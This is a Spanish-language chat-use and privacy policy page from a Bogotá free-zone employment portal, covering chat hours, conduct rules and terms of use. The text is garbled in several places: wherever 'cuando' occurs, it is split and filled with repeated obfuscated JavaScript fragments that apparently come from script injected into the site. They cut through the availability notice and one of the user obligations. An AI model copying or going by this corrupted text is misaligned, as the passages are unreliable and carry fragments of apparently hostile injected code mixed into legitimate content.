Inicio >> Políticas de chat

Bogotá, Colombia - Lunes, 11 de Diciembre de 2017 -
Políticas de chat

La utilización del servicio implica la aceptación expresa de las siguientes políticas de uso:

Chat de atención al usuario

Es un canal de comunicación escrita realizada de manera instantánea a través de internet, entre los ciudadanos y Trabaja en Zona Franca Bogotá, para atender consultas de orden general sobre la  generación de empleo y la promoción de procesos de formación.

Información de disponibilidad del Chat

El chat de Trabaja en Zona Franca Bogotá está habilitado de lunes a vierrnes (siempre y cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando no sea festivo), en el horario de 7:00 a.m. a 6:00 p.m., espacio en el cual el administrador de Trabaja en Zona Franca Bogotá, estará atento a resolver todas sus inquietudes y proporcionarle información adicional referenciada en la página web.

Cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando no esté disponible el chat en línea, podrá enviarnos su mensaje, a través del formato de contáctenos y sus dudas serán atendidas a través de correo electrónico.

Lo invitamos a hacer uso de este servicio.

Datos para registro

Con el fin de garantizar la trazabilidad de las temáticas, solicitudes e información intercambiada entre la entidad y los usuarios, el chat de Trabaja en Zona Franca Bogotá, solicitará mínimo la siguiente información para el registro y uso del mismo:


chat en linea


 

Reglas de uso del chat


  1. El servicio del chat tiene como propósito optimizar la comunicación directa con los usuarios que hacen uso del Portal.

  2. Al acceder al servicio del chat y para el uso del correo electrónico, el usuario declara conocer y aceptar los términos y condiciones generales, la política de privacidad y las reglas de uso expresadas en este documento.

  3. Trabaja en Zona Franca Bogotá no se responsabiliza por las opiniones y comentarios emitidos por los usuarios del chat; su contenido es única y exclusiva responsabilidad civil y penal de quien lo envió.

  4. Trabaja en Zona Franca Bogotá se reserva el derecho de retirar en cualquier momento, y a su criterio, los mensajes que vayan en contra de las reglas del chat o de la legislación vigente.

  5. Todo usuario del servicio de chat se compromete a:

    1. Mantener una conducta decente y de respeto mutuo cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando utiliza este servicio.

    2. No usar lenguaje ofensivo, calumnioso y ofensivo hacia el administrador de este servicio.

    3. No violar las leyes o reglamentos vigentes.

    4. No publicar mensajes comerciales.

    5. No enviar repetida e indiscriminadamente mensajes en el cuarto de chat, que puedan provocar una degradación del servicio.



  6. Trabaja en Zona Franca Bogotá no se hace responsable por los daños que provengan del uso de este servicio.

  7. Recomendación al usuario antes de acceder al servicio de chat:

    1. La velocidad de conexión al servidor de chat depende en gran parte de la velocidad de conexión de su proveedor de acceso a internet.



  8. Trabaja en Zona Franca Bogotá se reserva el derecho de terminar o suspender el acceso de los usuarios que infrinjan las reglas de uso del chat, de los términos y condiciones generales, de la Política de Privacidad, o cualquier otra disposición relacionada con el uso de esta herramienta.



Políticas de privacidad y términos de uso

Apreciado usuario:

El sitio web Trabaja en Zona Franca Bogotá tiene como función principal generar un canal de comunicación laboral efectivo y benéfico para empresas y comunidad, con respecto a dos compromisos claves: la generación de empleo y la promoción de procesos de formación y capacitación al interior de la Zona Franca de Bogotá.

Por medio de su sitio www.trabajaenzonafrancabogota.com , la Zona Franca de Bogotá publica las actividades laborales y oferta educativa que se desarrolla dentro del Parque Industrial, para beneficio de sus trabajadores y la comunidad. Al igual que los programas y en general información relacionada con la gestión que adelanta.

Trabaja en Zona Franca Bogotá no persigue ningún lucro, ganancia o interés comercial con los contenidos y enlaces que se publican en su sitio web y en los sitios web de los diferentes productos y servicios que son parte de la Zona Franca de Bogotá y a los cuales se accede a través de www.trabajaenzonafrancabogota.com.

Los servicios que ofrece Trabaja en Zona Franca Bogotá, son gratuitos y  no utilizan ningún tipo de intermediarios para acceder a ellos, por favor denuncie este tipo de irregularidades.

Trabaja en Zona Franca Bogotá solicita al visitante y al usuario de este sitio, que lean detallada y juiciosamente estos términos y condiciones de uso y política de privacidad, antes de iniciar su exploración o utilización. Si alguno de los dos, no está de acuerdo con estas condiciones o con cualquier disposición de la política de privacidad, le sugerimos que se abstenga de acceder o navegar en este sitio web institucional.

Vinculado a la red de prestadores del Servicio Público de Empleo.
Autorizado por la Unidad Administrativa Especial del Servicio Público
de Empleo del Ministerio de Trabajo según resolución No. 018 de 2015

Servicio de Empleo MINTRABAJO Presidencia de la República